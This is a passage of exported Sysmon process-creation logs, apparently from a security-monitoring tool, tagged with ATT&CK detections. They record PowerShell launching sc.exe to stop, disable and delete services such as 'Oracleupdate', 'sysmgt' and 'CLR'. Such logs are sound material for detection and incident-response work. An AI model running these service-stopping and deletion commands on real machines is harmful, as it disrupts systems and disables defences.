WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.981"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001014351900}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.096",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.944 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ba321900} +ProcessId: 3408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.947097100Z"",""eventRecordID"":""2048"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.944\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ba321900}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.944"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010ba321900}"",""processId"":""3408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.095",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.928 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f3311900} +ProcessId: 6440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config \gm Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.930305600Z"",""eventRecordID"":""2047"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.928\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f3311900}\r\nProcessId: 6440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.928"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010f3311900}"",""processId"":""6440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\\gm Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.042",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.908 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001060301900} +ProcessId: 3932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.910437900Z"",""eventRecordID"":""2045"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.908\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001060301900}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.908"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001060301900}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.979",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.878 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010092e1900} +ProcessId: 956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.879902700Z"",""eventRecordID"":""2042"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.878\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010092e1900}\r\nProcessId: 956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.878"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010092e1900}"",""processId"":""956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.939",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.858 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010792c1900} +ProcessId: 1808 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.859849900Z"",""eventRecordID"":""2040"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.858\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010792c1900}\r\nProcessId: 1808\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.858"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010792c1900}"",""processId"":""1808"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.901",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.848 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b22b1900} +ProcessId: 6132 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.849912400Z"",""eventRecordID"":""2039"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.848\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b22b1900}\r\nProcessId: 6132\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.848"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010b22b1900}"",""processId"":""6132"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 